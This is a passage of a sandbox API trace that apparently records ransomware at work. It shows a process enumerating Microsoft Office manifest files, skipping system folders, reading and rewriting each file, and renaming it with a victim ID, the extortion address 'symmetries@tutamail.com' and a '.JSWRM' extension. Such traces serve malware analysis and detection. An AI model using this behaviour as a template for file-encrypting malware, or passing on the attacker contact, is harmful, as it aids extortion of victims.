cchWideChar=35, lpMultiByteStr=0x22d0d8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.dcfmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 35 [0101.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0101.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0101.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0101.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0101.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.dcfmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.558] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9818) returned 1 [0101.558] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2650) returned 0x24d210 [0101.558] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2650, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x2650, lpOverlapped=0x0) returned 1 [0101.561] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.561] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2650, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x2650, lpOverlapped=0x0) returned 1 [0101.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.561] CloseHandle (hObject=0x45c) returned 1 [0101.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0101.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0101.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0101.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0101.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0101.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0101.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.562] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.dcfmui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.dcfmui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.dcfmui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0101.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0101.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0101.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.563] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1ff851e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1ff851e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd252f7b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x39d9c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", cAlternateFileName="C2RMAN~3.XML")) returned 1 [0101.563] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0101.563] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0101.563] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0101.563] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0101.563] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0101.563] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0101.563] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0101.563] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.563] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0101.563] lstrcmpiW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0101.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0101.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0101.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 48 [0101.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0101.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0101.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0101.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0101.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", cchWideChar=48, lpMultiByteStr=0x20dba8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 48 [0101.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0101.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0101.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0101.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0101.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.574] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=236956) returned 1 [0101.574] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0101.574] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0101.586] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.586] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0101.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.586] CloseHandle (hObject=0x45c) returned 1 [0101.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0101.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0101.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0101.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0101.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0101.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0101.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.587] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0101.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0101.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0101.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0101.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.588] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd3200239, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd3200239, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd330b2e9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8f70, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.excelmui.msi.16.en-us.xml", cAlternateFileName="C2D2CD~1.XML")) returned 1 [0101.588] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2=".") returned 1 [0101.588] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="..") returned 1 [0101.588] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="...") returned 1 [0101.588] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.588] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.588] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.588] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.588] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.588] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.588] lstrcmpiW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0101.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.excelmui.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0101.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.excelmui.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x22d298, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.excelmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 37 [0101.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0101.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0101.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.excelmui.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0101.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.excelmui.msi.16.en-us.xml", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.excelmui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 37 [0101.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0101.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0101.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0101.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0101.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.excelmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.590] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=36720) returned 1 [0101.590] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8f70) returned 0x24d210 [0101.590] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8f70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x8f70, lpOverlapped=0x0) returned 1 [0101.594] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.594] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8f70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x8f70, lpOverlapped=0x0) returned 1 [0101.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.594] CloseHandle (hObject=0x45c) returned 1 [0101.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0101.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0101.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0101.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0101.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0101.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0101.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.595] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.excelmui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.excelmui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.excelmui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0101.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0101.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0101.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.595] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1f5fb21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1f5fb21, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd23fe538, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8f8e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", cAlternateFileName="C2RMAN~1.XML")) returned 1 [0101.595] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0101.595] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0101.596] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0101.596] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0101.596] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0101.596] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0101.596] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0101.596] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.596] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0101.596] lstrcmpiW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0101.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0101.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 